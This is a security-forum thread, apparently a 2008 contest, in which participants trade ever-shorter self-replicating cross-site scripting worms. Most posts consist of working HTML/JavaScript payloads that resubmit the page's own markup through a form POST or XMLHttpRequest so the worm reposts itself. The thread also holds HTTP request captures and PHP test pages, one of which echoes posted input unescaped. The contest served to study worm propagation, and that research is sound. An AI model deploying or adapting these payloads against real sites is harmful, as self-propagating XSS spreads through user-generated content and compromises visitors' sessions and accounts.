@ma1 and SDC:

Maybe I am doing sth wrong but it seems both of your latest submissions grow:

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body>
<div>
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">XXX
</div>
</body>
</html>

Edited 1 time(s). Last edit at 01/09/2008 03:56PM by .mario.

yes it grows, u r right, shame on me hehe
to stop it to grow you have to do:
<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML+'</form>',submit(alert('XSS'))"></form>

anyway.. 166 bytes, u r the winner again :D

edit

ah no 160 bytes

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',submit(i[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">

but u are the winner still hehe

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/09/2008 03:43PM by sirdarckcat.

Can someone give me the current TOP THREE, according to RSnake's rules? I have completely lost track after the rule-change, change rollback and whatever.

Oh, my new submission by the way. This should work. [163 chars]

<form><img src="" onerror="i=parentNode,i.action=(i.method='post')+'.php',j=nextSibling,j.value='<form>'+i.innerHTML,i.submit(alert('xss'))"><input name="content">

And also, am I the first to use nextSibling? It's awesome (nextSibling that is).



Edited 1 time(s). Last edit at 01/09/2008 03:51PM by Spyware.

ahm.. .mario + ma1 + I dunno


.mario:
<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

ma1:

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">


etc..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

8) must have a payload of "XSS" in an alert box

OK, these bend rule #8 a bit, but whatever...

<form><input name="content"><iframe onload="XSS:with(_=parentNode)submit(alert(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',146)))"

152!

<form>XSS<input name="content"><iframe onload="with(_=parentNode)submit(alert(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',145)))"

151!

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

lol, I'm not sure if that's valid, but that's a killer idea xD

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

for what is is worth - if you read my post on XHR you would see that the latest version of firefox automatically adds the content-type header as does IE7 which thereby conforms to w3c standards

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Host	sla.ckers.org
User-Agent	Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept	text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language	en-us,en;q=0.5
Accept-Encoding	gzip,deflate
Accept-Charset	ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive	300
Connection	keep-alive
Referer	http://sla.ckers.org/forum/read.php?2,18790,19352
Cookie	phorum_session_v5=123%3A7753godessbunnieyeahdadadada1234
Pragma	no-cache
Cache-Control	no-cache

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

sorry sdc - i meant firefox 2.0.0.11 adds the content type header for XHR (next time i won't assume anything)

POST /post.php HTTP/1.1
Host: xxxxxx.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xxxxxx.com.au/xss.tester.php
Content-Length: 148
Content-Type: application/xml
Proxy-Authorization: xxxxx
Pragma: no-cache
Cache-Control: no-cache
content=<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>

EDIT: To address the + encoding issue

151 byte XHR - only works with the firefox 2.0.0.11 and up and IE. No DocType issues

<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=<p>',parentNode.innerHTML,'<p>'))"></iframe><p>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 01/09/2008 05:45PM by digi7al64.

@ma1 - hahah, I don't think that payload quiiiiite cuts the mustard. I didn't say ".*XSS.*" ;)

- RSnake
Gotta love it. http://ha.ckers.org

Yup, by my math it does look like .mario is in the lead with 154 bytes, no growth, correct payload and all the lovely infinite self replication a bad guy could ever want.

- RSnake
Gotta love it. http://ha.ckers.org

Also, I think I was confusing people regarding the XHR stuff. I have since revised my post for anyone who thought they needed the content type:

http://sla.ckers.org/forum/read.php?2,18790,page=15#msg-19384

Because both FF 2.0.0.11 and the current version of IE7.0 both send it implicitly when it's not there, it's not required for the purpose of this contest.

- RSnake
Gotta love it. http://ha.ckers.org

so by my estimates this puts me in the lead at 151 bytes

self replicating - tick
correct payload - tick
no doctype issues - tick
works in the latest (non beta) browsers - tick
doesn't break with url decoding - tick

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

@digi7al64 - yours does what it advertises, but for some reason or another, it's not working with the post.php page, I showed:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-trans
itional.dtd">
<html>
<head>
</head>
<body onload="var a=1;" onfocus="var a=1;">


<?php
echo $_POST[content];
?>



</body>
</html>


It's not URL encoding it when it's sending it, perhaps that's the problem? It shows up as blank when it's reflected, as if there is no content. Odd.

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/09/2008 06:30PM by rsnake.

hahahaha

echo $_POST[content];

should be

echo $_POST['content'];

EDIT:
Being a .NET programmer it seems my knowledge of PHP is limited and your code will work.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 01/09/2008 06:49PM by digi7al64.

„<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=',parentNode.innerHTML.match(/„.+\v/))),alert('XSS')">0x0B

Is there anything wrong with this 145 character submission? I do believe it is safe to assume there is no „ on the page (especially as I hadn't ever seen that character before). Also, I'm not really relying on knowing the DOM of the page. It must be safe to assume that the iframe has a parentNode (didn't RSnake say we can assume the page has a body?). This is my official submission as of now (since the change with decoding and the + character).

-Dan

@doctordan - you can assume nothing other then that this code will be included on the page... which for all we know could contain nothing other then the worm. Hence you need to add a parentnode else you have doctype issues which makes it invalid (at least this is what i have gathered from the discussion)

However if there is a body tag then I would have used _.innerHTML which makes my submission 143 bytes long

<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(''.concat('content=<p id=_>',_.innerHTML,'<p>'))</script></p>


--------------------------------

@rsnake - this is the code i am using to test my code and it is logging fine

<?php
	$content = "";
	if (!empty($_POST['content'])) {
		$date=date("F j, Y, g:i a"); 
		$content = urldecode($_POST['content']);
		$post = $date.' - '.htmlspecialchars($content).'<br/>';
	}
	
	$filename = 'log.html';
	
	// Let's make sure the file exists and is writable first.
	if (is_writable($filename) && !empty($post)) {
		if (!$handle = fopen($filename, 'a')) {
			 echo "Cannot open file ($filename)";
			 exit;
		}
		// Write $somecontent to our opened file.
		if (fwrite($handle, $post) === FALSE) {
			echo "Cannot write to file ($filename)";
			exit;
		}
	
		fclose($handle);
	
	} else {
		echo "The file $filename is not writable";
	}

?>
<html>
<head></head>
<body>
<form method="post" action="post.php">
<textarea name="content" style="width: 100%; height: 100px;"><?php echo(htmlspecialchars($content));?></textarea>
<input type="submit" value="submit">
</form>
<?php
	echo ("<hr/>".$content."<hr/>".htmlspecialchars($content).'<hr/>');
?>
</body>
</html>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 4 time(s). Last edit at 01/09/2008 07:17PM by digi7al64.

the problem is that the auto-added header of firefox:
Content-Type: application/xml

should be:
Content-Type: application/x-www-form-urlencoded


Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

@DoctorDan - I will be testing both with and without DOCTYPE. I'd tell you if it works or not but I can't cut and paste (long story involving a crappy wireless router, which I shall not explain out of sheer humiliation out of having not bought a better WiFi). Annnnyway, just make sure it works with and without any other content on the page, and yes, it's safe to assume exotic chars are okay.

@digi7al64 - I'll test again tomorrow morning, but I suggest using the code I showed if you want to get a better approximation of what I'm using to test your code.

- RSnake
Gotta love it. http://ha.ckers.org

My final submission :)

<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>

132 chars

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/09/2008 11:02PM by Gareth Heyes.

Gareth, you forgot alert('xss'), also you can drop the space between

src="" onerror

as well i believe, also on my test page it submits as

content=,<b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>

adding the extra , at the start of the content value

therefore your final xhr worm would be 144 bytes. Nice stuff!
,<b><img src=""onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 01/09/2008 11:37PM by digi7al64.

Gareth's with an alert (143): <b><img src="" onerror="with(new XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join(alert('XSS')))"></b>



Edited 2 time(s). Last edit at 01/09/2008 11:41PM by thornmaker.

<img src="" onerror="appendChild(cloneNode(1));c=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send(['content=',c].join(''));alert('XSS')">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

<iframe onload="c=['content=','<iframe onload=\42',attributes[0].nodeValue,'\42>'].join('');with(new XMLHttpRequest)open('POST','post.php'),send(c);alert('XSS')">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/10/2008 01:02AM by Gareth Heyes.

Wow! did I miss something? or are right back where we started? Don't know about you guys but, I can't seem to to get XHR function without the proper content-type, and I do have the newest version of FireFox.

Quote

Thursday the 10th of January at 7PM GMT

Is it over? Please say it's over!

Yeah free us from our sheer misery!

@Ronald

The contest doesn't require the content-type headers. + are not allowed either because they get converted to spaces unless the payload is correctly escaped.

I'm still fighting Mario's vector, I wish the contest was shorter I'm totally addicted :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Well, without the headers the worm doesn't propagate.
so those vectors are useless then, the x-www-form-urlencoded mime escapes
the data properly. So, I can't see how anyone can win with a flawed vector?



Edited 1 time(s). Last edit at 01/10/2008 03:19AM by Ronald.

Me neither - I couldn't get any of the vectors w/o content-type get running on various boxes with default settings.